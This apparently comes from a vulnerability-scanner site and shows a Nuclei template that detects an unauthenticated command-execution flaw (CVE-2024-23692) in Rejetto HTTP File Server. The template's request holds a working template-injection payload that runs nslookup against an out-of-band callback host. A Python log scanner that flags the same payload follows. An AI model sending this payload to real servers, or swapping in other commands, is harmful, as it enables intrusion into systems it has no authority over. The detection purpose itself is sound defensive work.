Rejetto HTTP File Server - Template injection
ID: CVE-2024-23692
Severity: critical
Author: johnk3r
Tags: cve,cve2024,hfs,rejetto,rce,kev
Description
This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
YAML Source
```yaml
id: CVE-2024-23692

info:
  name: Rejetto HTTP File Server - Template injection
  author: johnk3r
  severity: critical
  description: |
    This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
  reference:
    - https://github.com/rapid7/metasploit-framework/pull/19240
    - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-23692
    cwe-id: CWE-1336
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"HttpFileServer httpd"
  tags: cve,cve2024,hfs,rejetto,rce,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "rejetto"
# digest: 4a0a004730450220266ebb0754936da88756f26dba560443b5632499e2647e69bbcba146e7dc9adb022100b97230c3427cb6ab00b086753698765249a715ed475a22b633ee2b284ef7aabd:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-23692.yaml"
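
A defender-side companion to the template, added here and not part of the original page or the Nuclei project: it flags access-log requests whose `search` parameter carries the `{.` ... `.}` macro syntax seen in the template's request. The combined log format, the sample lines and the `oast.example` host are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Macro delimiters "{." ... ".}" as they appear in the template's search parameter.
MACRO_RE = re.compile(r"\{\.\s*([^|.{}]*)")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format assumed); oast.example is a placeholder.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jul/2024:10:00:01 +0000] "GET /?search=report HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jul/2024:10:00:05 +0000] "GET /?n=%0A&cmd=nslookup+oast.example'
    '&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}RESULT:'
    '{.^abc.} HTTP/1.1" 200 4200',
    '198.51.100.9 - - [01/Jul/2024:10:00:09 +0000] "GET /?search=%7B.%3Fn.%7D HTTP/1.1" 200 4100',
]

def classify(log_line):
    """Return (verdict, macro_names) for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return ("unparsed", [])
    macros = []
    # parse_qsl percent-decodes values, so encoded and raw braces look the same here.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if name.lower() == "search":
            macros += [x.strip().lower() for x in MACRO_RE.findall(value)]
    if "exec" in macros:
        return ("exec-macro", macros)
    return ("macro-syntax", macros) if macros else ("clean", [])

def scan(lines):
    """Return (line_index, verdict, macro_names) for every non-clean line."""
    hits = []
    for i, line in enumerate(lines):
        verdict, macros = classify(line)
        if verdict != "clean":
            hits.append((i, verdict, macros))
    return hits

if __name__ == "__main__":
    for idx, verdict, macros in scan(SAMPLE_LOG):
        print(idx, verdict, macros)
```

An `exec-macro` verdict matches the request shape this template sends; `macro-syntax` alone is worth reviewing because a plain search term has no reason to contain macro delimiters.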